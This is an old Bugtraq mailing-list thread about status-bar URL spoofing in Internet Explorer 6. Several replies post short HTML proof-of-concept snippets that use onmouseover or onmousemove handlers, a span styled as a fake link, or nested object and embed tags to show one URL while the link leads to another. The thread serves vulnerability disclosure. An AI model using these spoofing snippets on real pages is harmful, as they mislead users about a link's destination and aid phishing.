Or even a fake "a" tag: <span style="color: blue; text-decoration: underline; cursor: hand;" onmouseover="window.status = 'http://www.msn.com/';" onmouseout="window.status = 'Done.'" onclick="document.location = 'http://www.google.com'"> Visit Msn! </span> -----Original Message----- From: q q [mailto:systemcracker@xxxxxxxxx] Sent: Wednesday, 17 November 2004 3:11 AM To: bugtraq@xxxxxxxxxxxxxxxxx Subject: Re: New URL spoofing bug in Microsoft Internet Explorer I thought this was obvious, but having seen the amount of discussion, here's another URL spoofer: <a href="http://www.google.com"; onmousemove="window.status='http://www.msn.com';" onmouseout="window.status='Done.';">Visit Msn!</a> note that <a href="http://www.google.com"; onmouseover="window.status='http://www.msn.com';" onmouseout="window.status='Done.';">Visit Msn!</a> won't work - it seems MS have already half fixed this.... (tested on MSIE 6.0, winXP) On 8 Nov 2004 23:30:55 -0000, roozbeh afrasiabi <roozbeh_afrasiabi@xxxxxxxxx> wrote: > In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@oemcomputer> > > Here is another way of spoofing the status bar: > > <a> tag + <object> tag > > <!--A HREF=http://www.yahoo.com><!--OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" > > codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflas h.cab#version=6,0,0,0" > > WIDTH="300" HEIGHT="50" id="link" ALIGN=""> > > <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > > <PARAM NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu > > VALU=FALSE> > > <EMBED src="link.swf" quality=high bgcolor=#FFFFFF WIDTH="300" HEIGHT="50" NAME="link" ALIGN="" > > TYPE="application/x-shockwave-flash" > PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer";></EMBED> > > </a></OBJECT></a> > > *this method of spoofing the status bar allows malicious users to hide > the target url from suspecting ppl ,demo page uses flash to generate > > random urls. > > demo: > > http://www.persiax.com/pocs/statusbar/status.htm > > -- PHP, mySQL Security and more at http://www.puremango.co.uk ********************************************************************** This email message and accompanying data may contain information that is confidential and/or subject to legal privilege. If you are not the intended recipient, you are notified that any use, dissemination, distribution or copying of this message or data is prohibited. If you have received this email message in error, please notify us immediately and erase all copies of this message and attachments. This email is for your convenience only, you should not rely on any information contained herein for contractual or legal purposes. You should only rely on information and/or instructions in writing and on company letterhead signed by authorised persons. **********************************************************************
